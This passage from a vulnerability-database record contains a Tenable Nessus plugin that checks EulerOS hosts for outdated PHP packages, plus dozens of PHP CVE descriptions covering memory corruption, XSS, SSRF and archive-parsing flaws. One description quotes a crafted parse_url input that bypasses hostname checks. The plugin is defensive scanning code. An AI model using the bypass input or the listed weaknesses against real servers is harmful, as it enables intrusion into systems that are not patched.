ext/spl/spl_observer.c in PHP before 7.0.12 does not\n verify that a key is an object, which allows remote\n attackers to execute arbitrary code or cause a denial\n of service (uninitialized memory access) via crafted\n serialized data.(CVE-2016-7480)\n\n - ext/standard/var_unserializer.re in PHP before 5.6.26\n mishandles object-deserialization failures, which\n allows remote attackers to cause a denial of service\n (memory corruption) or possibly have unspecified other\n impact via an unserialize call that references a\n partially constructed object.(CVE-2016-7411)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in\n PHP before 5.6.12 mishandles driver behavior for\n SQL_WVARCHAR columns, which allows remote attackers to\n cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the\n odbc_fetch_array function to access a certain type of\n Microsoft SQL Server table.(CVE-2015-8879)\n\n - In PHP before 5.6.32, 7.x before 7.0.25, and 7.1.x\n before 7.1.11, an error in the date extension's\n timelib_meridian handling of 'front of' and 'back of'\n directives could be used by attackers able to supply\n date strings to leak information from the interpreter,\n related to ext/date/lib/parse_date.c out-of-bounds\n reads affecting the php_parse_date function. NOTE: this\n is a different issue than\n CVE-2017-11145.(CVE-2017-16642)\n\n - The exif_process_IFD_in_JPEG function in\n ext/exif/exif.c in PHP before 5.5.35, 5.6.x before\n 5.6.21, and 7.x before 7.0.6 does not validate IFD\n sizes, which allows remote attackers to cause a denial\n of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header\n data.(CVE-2016-4543)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 does not properly construct spprintf arguments,\n which allows remote attackers to cause a denial of\n service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header\n data.(CVE-2016-4542)\n\n - The grapheme_strpos function in\n ext/intl/grapheme/grapheme_string.c in PHP before\n 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6\n allows remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset.(CVE-2016-4541)\n\n - The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP before\n 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6\n allows remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset.(CVE-2016-4540)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 allows remote attackers to cause a denial of\n service (buffer under-read and segmentation fault) or\n possibly have unspecified other impact via crafted XML\n data in the second argument, leading to a parser level\n of zero.(CVE-2016-4539)\n\n - ** DISPUTED ** Integer overflow in the\n php_raw_url_encode function in ext/standard/url.c in\n PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before\n 7.0.5 allows remote attackers to cause a denial of\n service (application crash) via a long string to the\n rawurlencode function. NOTE: the vendor says 'Not sure\n if this qualifies as security issue (probably\n not).'(CVE-2016-4070)\n\n - Use-after-free vulnerability in wddx.c in the WDDX\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to cause a denial of service\n (memory corruption and application crash) or possibly\n have unspecified other impact by triggering a\n wddx_deserialize call on XML data containing a crafted\n var element.(CVE-2016-3141)\n\n - In PHP before 5.6.28 and 7.x before 7.0.13, incorrect\n handling of various URI components in the URL parser\n could be used by attackers to bypass hostname-specific\n URL checks, as demonstrated by\n evil.example.com:80#@good.example.com/ and\n evil.example.com:80?@good.example.com/ inputs to the\n parse_url function (implemented in the php_url_parse_ex\n function in ext/standard/url.c).(CVE-2016-10397)\n\n - Multiple use-after-free vulnerabilities in SPL in PHP\n before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before\n 5.6.12 allow remote attackers to execute arbitrary code\n via vectors involving (1) ArrayObject, (2)\n SplObjectStorage, and (3) SplDoublyLinkedList, which\n are mishandled during unserialization.(CVE-2015-6831)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A heap out-of-bounds write occurs in\n bitset_set_range() during regular expression\n compilation due to an uninitialized variable from an\n incorrect state transition. An incorrect state\n transition in parse_char_class() could create an\n execution path that leaves a critical local variable\n uninitialized until it's used as an index, resulting in\n an out-of-bounds write memory\n corruption.(CVE-2017-9228)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A stack out-of-bounds read occurs in\n mbc_enc_len() during regular expression searching.\n Invalid handling of reg->dmin in forward_search_range()\n could result in an invalid pointer dereference, as an\n out-of-bounds read from a stack buffer.(CVE-2017-9227)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A heap out-of-bounds write or read\n occurs in next_state_val() during regular expression\n compilation. Octal numbers larger than 0xff are not\n handled correctly in fetch_token() and\n fetch_token_in_cc(). A malformed regular expression\n containing an octal number in the form of '\\700' would\n produce an invalid code point value larger than 0xff in\n next_state_val(), resulting in an out-of-bounds write\n memory corruption.(CVE-2017-9226)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A stack out-of-bounds read occurs in\n match_at() during regular expression searching. A\n logical error involving order of validation and access\n in match_at() could result in an out-of-bounds read\n from a stack buffer.(CVE-2017-9224)\n\n - The exif_process_IFD_in_MAKERNOTE function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (out-of-bounds array access\n and memory corruption), obtain sensitive information\n from process memory, or possibly have unspecified other\n impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The php_url_parse_ex function in ext/standard/url.c in\n PHP before 5.5.38 allows remote attackers to cause a\n denial of service (buffer over-read) or possibly have\n unspecified other impact via vectors involving the\n smart_str data type.(CVE-2016-6288)\n\n - Integer overflow in the php_html_entities function in\n ext/standard/html.c in PHP before 5.5.36 and 5.6.x\n before 5.6.22 allows remote attackers to cause a denial\n of service or possibly have unspecified other impact by\n triggering a large output string from the\n htmlspecialchars function.(CVE-2016-5094)\n\n - The get_icu_value_internal function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.36,\n 5.6.x before 5.6.22, and 7.x before 7.0.7 does not\n ensure the presence of a '\\0' character, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a crafted locale_get_primary_language\n call.(CVE-2016-5093)\n\n - In PHP before 5.6.31, an invalid free in the WDDX\n deserialization of boolean parameters could be used by\n attackers able to inject XML for deserialization to\n crash the PHP interpreter, related to an invalid free\n for an empty boolean element in\n ext/wddx/wddx.c.(CVE-2017-11143)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.29 and 7.x before 7.0.14 allows\n remote attackers to cause a denial of service\n (out-of-bounds read and memory corruption) or possibly\n have unspecified other impact via an empty boolean\n element in a wddxPacket XML document.(CVE-2016-9935)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before\n 7.0.13 allows remote attackers to cause a denial of\n service (NULL pointer dereference) via crafted\n serialized data in a wddxPacket XML document, as\n demonstrated by a PDORow string.(CVE-2016-9934)\n\n - The ZIP signature-verification feature in PHP before\n 5.6.26 and 7.x before 7.0.11 does not ensure that the\n uncompressed_filesize field is large enough, which\n allows remote attackers to cause a denial of service\n (out-of-bounds memory access) or possibly have\n unspecified other impact via a crafted PHAR archive,\n related to ext/phar/util.c and\n ext/phar/zip.c.(CVE-2016-7414)\n\n - ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26\n and 7.x before 7.0.11 does not verify that a BIT field\n has the UNSIGNED_FLAG flag, which allows remote MySQL\n servers to cause a denial of service (heap-based buffer\n overflow) or possibly have unspecified other impact via\n crafted field metadata.(CVE-2016-7412)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A SIGSEGV occurs in\n left_adjust_char_head() during regular expression\n compilation. Invalid handling of reg->dmax in\n forward_search_range() could result in an invalid\n pointer dereference, normally as an immediate\n denial-of-service condition.(CVE-2017-9229)\n\n - The openssl_random_pseudo_bytes function in\n ext/openssl/openssl.c in PHP before 5.4.44, 5.5.x\n before 5.5.28, and 5.6.x before 5.6.12 incorrectly\n relies on the deprecated RAND_pseudo_bytes function,\n which makes it easier for remote attackers to defeat\n cryptographic protection mechanisms via unspecified\n vectors.(CVE-2015-8867)\n\n - The sapi_header_op function in main/SAPI.c in PHP\n before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before\n 5.6.6 supports deprecated line folding without\n considering browser compatibility, which allows remote\n attackers to conduct cross-site scripting (XSS) attacks\n against Internet Explorer by leveraging (1) %0A%20 or\n (2) %0D%0A%20 mishandling in the header\n function.(CVE-2015-8935)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x\n before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before\n 7.2.4. Dumpable FPM child processes allow bypassing\n opcache access controls because fpm_unix.c makes a\n PR_SET_DUMPABLE prctl call, allowing one user (in a\n multiuser environment) to obtain sensitive information\n from the process memory of a second user's PHP\n applications by running gcore on the PID of the PHP-FPM\n worker process.(CVE-2018-10545)\n\n - An issue was discovered in ext/phar/phar_object.c in\n PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before\n 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS\n on the PHAR 403 and 404 error pages via request data of\n a request for a .phar file. NOTE: this vulnerability\n exists because of an incomplete fix for\n CVE-2018-5712.(CVE-2018-10547)\n\n - The Apache2 component in PHP before 5.6.38, 7.0.x\n before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before\n 7.2.10 allows XSS via the body of a 'Transfer-Encoding:\n chunked' request, because the bucket brigade is\n mishandled in the php_handler function in\n sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\n - PHP through 7.1.11 enables potential SSRF in\n applications that accept an fsockopen or pfsockopen\n hostname argument with an expectation that the port\n number is constrained. Because a :port syntax is\n recognized, fsockopen will use the port number that is\n specified in the hostname argument, instead of the port\n number in the second argument of the\n function.(CVE-2017-7272 )\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, a stack-based buffer overflow in the\n zend_ini_do_op() function in Zend/zend_ini_parser.c\n could cause a denial of service or potentially allow\n executing code. NOTE: this is only relevant for PHP\n applications that accept untrusted input (instead of\n the system's php.ini file) for the parse_ini_string or\n parse_ini_file function, e.g., a web application for\n syntax validation of php.ini\n directives.(CVE-2017-11628)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR\n archive handler could be used by attackers supplying\n malicious archive files to crash the PHP interpreter or\n potentially disclose information due to a buffer\n over-read in the phar_parse_pharfile function in\n ext/phar/phar.c.(CVE-2017-11147)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, the openssl extension PEM sealing code\n did not check the return value of the OpenSSL sealing\n function, which could lead to a crash of the PHP\n interpreter, related to an interpretation conflict for\n a negative number in ext/openssl/openssl.c, and an\n OpenSSL documentation omission.(CVE-2017-11144)\n\n - The locale_accept_from_http function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.38,\n 5.6.x before 5.6.24, and 7.x before 7.0.9 does not\n properly restrict calls to the ICU\n uloc_acceptLanguageFromHTTP function, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a call with a long argument.(CVE-2016-6294)\n\n - Session fixation vulnerability in the Sessions\n subsystem in PHP before 5.5.2 allows remote attackers\n to hijack web sessions by specifying a session\n ID.(CVE-2011-4718)\n\n - Off-by-one error in the phar_parse_zipfile function in\n ext/phar/zip.c in PHP before 5.5.30 and 5.6.x before\n 5.6.14 allows remote attackers to cause a denial of\n service (uninitialized pointer dereference and\n application crash) by including the / filename in a\n .zip PHAR archive.(CVE-2015-7804)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.26 and 7.x before 7.0.11 allows\n remote attackers to cause a denial of service (invalid\n pointer access and out-of-bounds read) or possibly have\n unspecified other impact via an incorrect boolean\n element in a wddxPacket XML document, leading to\n mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - The exif_process_user_comment function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (NULL pointer dereference and\n application crash) via a crafted JPEG\n image.(CVE-2016-6292)\n\n - The make_http_soap_request function in\n ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before\n 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service (type\n confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method\n in ext/soap/soap.c.(CVE-2016-3185)\n\n - Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in\n PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x\n before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before\n 3.12.1 allows remote attackers to create arbitrary\n empty directories via a crafted ZIP\n archive.(CVE-2014-9767)\n\n - The phar_convert_to_other function in\n ext/phar/phar_object.c in PHP before 5.4.43, 5.5.x\n before 5.5.27, and 5.6.x before 5.6.11 does not\n validate a file pointer before a close operation, which\n allows remote attackers to cause a denial of service\n (segmentation fault) or possibly have unspecified other\n impact via a crafted TAR archive that is mishandled in\n a Phar::convertToData call.(CVE-2015-5589)\n\n - Directory traversal vulnerability in the PharData class\n in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x\n before 5.6.12 allows remote attackers to write to\n arbitrary files via a .. (dot dot) in a ZIP archive\n entry that is mishandled during an extractTo\n call.(CVE-2015-6833)\n\n - The phar_get_entry_data function in ext/phar/util.c in\n PHP before 5.5.30 and 5.6.x before 5.6.14 allows remote\n attackers to cause a denial of service (NULL pointer\n dereference and application crash) via a .phar file\n with a crafted TAR archive entry in which the Link\n indicator references a file that does not\n exist.(CVE-2015-7803)\n\n - Stack consumption vulnerability in GD in PHP before\n 5.6.12 allows remote attackers to cause a denial of\n service via a crafted imagefilltoborder\n call.(CVE-2015-8874)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP\n before 5.5.32, 5.6.x before 5.6.18, and 7.x before\n 7.0.3 allows remote attackers to cause a denial of\n service (application crash) or possibly have\n unspecified other impact via a crafted TAR\n archive.(CVE-2016-2554)\n\n - The phar_parse_zipfile function in zip.c in the PHAR\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service\n (out-of-bounds read and application crash) by placing a\n PK\\x05\\x06 signature at an invalid\n location.(CVE-2016-3142)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x\n before 7.0.10 skips invalid session names in a way that\n triggers incorrect parsing, which allows remote\n attackers to inject arbitrary-type session data by\n leveraging control of a session name, as demonstrated\n by object injection.(CVE-2016-7125)\n\n - The exif_process_IFD_in_TIFF function in\n ext/exif/exif.c in PHP before 5.6.25 and 7.x before\n 7.0.10 mishandles the case of a thumbnail offset that\n exceeds the file size, which allows remote attackers to\n obtain sensitive information from process memory via a\n crafted TIFF image.(CVE-2016-7128)\n\n - The get_icu_disp_value_src_php function in\n ext/intl/locale/locale_methods.c in PHP before 5.3.29,\n 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not\n properly restrict calls to the ICU uresbund.cpp\n component, which allows remote attackers to cause a\n denial of service (buffer overflow) or possibly have\n unspecified other impact via a locale_get_display_name\n call with a long first argument.(CVE-2014-9912)\n\n - Use-after-free vulnerability in the SPL unserialize\n implementation in ext/spl/spl_array.c in PHP before\n 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12\n allows remote attackers to execute arbitrary code via\n crafted serialized data that triggers misuse of an\n array field.(CVE-2015-6832)\n\n - The make_http_soap_request function in\n ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before\n 5.5.28, and 5.6.x before 5.6.12 does not properly\n retrieve keys, which allows remote attackers to cause a\n denial of service (NULL pointer dereference, type\n confusion, and application crash) or possibly execute\n arbitrary code via crafted serialized data representing\n a numerically indexed _cookies array, related to the\n SoapClient::__call method in\n ext/soap/soap.c.(CVE-2015-8835)\n\n - The uloc_acceptLanguageFromHTTP function in\n common/uloc.cpp in International Components for Unicode\n (ICU) through 57.1 for C/C++ does not ensure that there\n is a '\\0' character at the end of a certain temporary\n array, which allows remote attackers to cause a denial\n of service (out-of-bounds read) or possibly have\n unspecified other impact via a call with a long\n httpAcceptLanguage argument.(CVE-2016-6293)\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and\n 7.3.x below 7.3.6 it is possible to supply it with data\n what will cause it to read past the allocated buffer.\n This may lead to information disclosure or\n crash.(CVE-2019-11040)\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and\n 7.3.x below 7.3.8 it is possible to supply it with data\n what will cause it to read past the allocated buffer.\n This may lead to information disclosure or\n crash.(CVE-2019-11041)\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and\n 7.3.x below 7.3.8 it is possible to supply it with data\n what will cause it to read past the allocated buffer.\n This may lead to information disclosure or\n crash.(CVE-2019-11042)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2438\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72902c09\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2554\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"php-5.4.16-42.h63\",\n \"php-cli-5.4.16-42.h63\",\n \"php-common-5.4.16-42.h63\",\n \"php-gd-5.4.16-42.h63\",\n \"php-ldap-5.4.16-42.h63\",\n \"php-mysql-5.4.16-42.h63\",\n \"php-odbc-5.4.16-42.h63\",\n \"php-pdo-5.4.16-42.h63\",\n \"php-pgsql-5.4.16-42.h63\",\n \"php-process-5.4.16-42.h63\",\n \"php-recode-5.4.16-42.h63\",\n \"php-soap-5.4.16-42.h63\",\n \"php-xml-5.4.16-42.h63\",\n \"php-xmlrpc-5.4.16-42.h63\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-17T14:40:06", "description": "According to the versions of the php packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer.\n This may lead to information disclosure or crash.(CVE-2019-11042)\n\n - When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer.\n This may lead to information disclosure or crash.(CVE-2019-11041)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1. There is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file.(CVE-2018-5712)\n\n - gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx.(CVE-2018-5711)\n\n - The Apache2 component in PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 allows XSS via the body of a 'Transfer-Encoding:\n chunked' request, because the bucket brigade is mishandled in the php_handler function in sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.(CVE-2018-14851)\n\n - An issue was discovered in ext/phar/phar_object.c in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS on the PHAR 403 and 404 error pages via request data of a request for a .phar file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-5712.(CVE-2018-10547)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before 7.2.4. Dumpable FPM child processes allow bypassing opcache access controls because fpm_unix.c makes a PR_SET_DUMPABLE prctl call, allowing one user (in a multiuser environment) to obtain sensitive information from the process memory of a second user's PHP applications by running gcore on the PID of the PHP-FPM worker process.(CVE-2018-10545)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, a stack-based buffer overflow in the zend_ini_do_op() function in Zend/zend_ini_parser.c could cause a denial of service or potentially allow executing code. NOTE: this is only relevant for PHP applications that accept untrusted input (instead of the system's php.ini file) for the parse_ini_string or parse_ini_file function, e.g., a web application for syntax validation of php.ini directives.(CVE-2017-11628)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - The exif_process_IFD_in_TIFF function in ext/exif/exif.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles the case of a thumbnail offset that exceeds the file size, which allows remote attackers to obtain sensitive information from process memory via a crafted TIFF image.(CVE-2016-7128)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x before 7.0.10 skips invalid session names in a way that triggers incorrect parsing, which allows remote attackers to inject arbitrary-type session data by leveraging control of a session name, as demonstrated by object injection.(CVE-2016-7125)\n\n - The locale_accept_from_http function in ext/intl/locale/locale_methods.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 does not properly restrict calls to the ICU uloc_acceptLanguageFromHTTP function, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a call with a long argument.(CVE-2016-6294)\n\n - The exif_process_user_comment function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted JPEG image.(CVE-2016-6292)\n\n - The exif_process_IFD_in_MAKERNOTE function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (out-of-bounds array access and memory corruption), obtain sensitive information from process memory, or possibly have unspecified other impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The php_url_parse_ex function in ext/standard/url.c in PHP before 5.5.38 allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via vectors involving the smart_str data type.(CVE-2016-6288)\n\n - Integer overflow in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory consumption or application crash) via a truncated manifest entry in a PHAR archive.(CVE-2016-10159)\n\n - It was found that the exif_convert_any_to_int() function in PHP was vulnerable to floating point exceptions when parsing tags in image files. A remote attacker with the ability to upload a malicious image could crash PHP, causing a Denial of Service.(CVE-2016-10158)\n\n - Stack consumption vulnerability in GD in PHP before 5.6.12 allows remote attackers to cause a denial of service via a crafted imagefilltoborder call.(CVE-2015-8874)\n\n - ext/libxml/libxml.c in PHP before 5.5.22 and 5.6.x before 5.6.6, when PHP-FPM is used, does not isolate each thread from libxml_disable_entity_loader changes in other threads, which allows remote attackers to conduct XML External Entity (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document, a related issue to CVE-2015-5161.(CVE-2015-8866)\n\n - A flaw was found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.(CVE-2015-7804)\n\n - A flaw was found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when 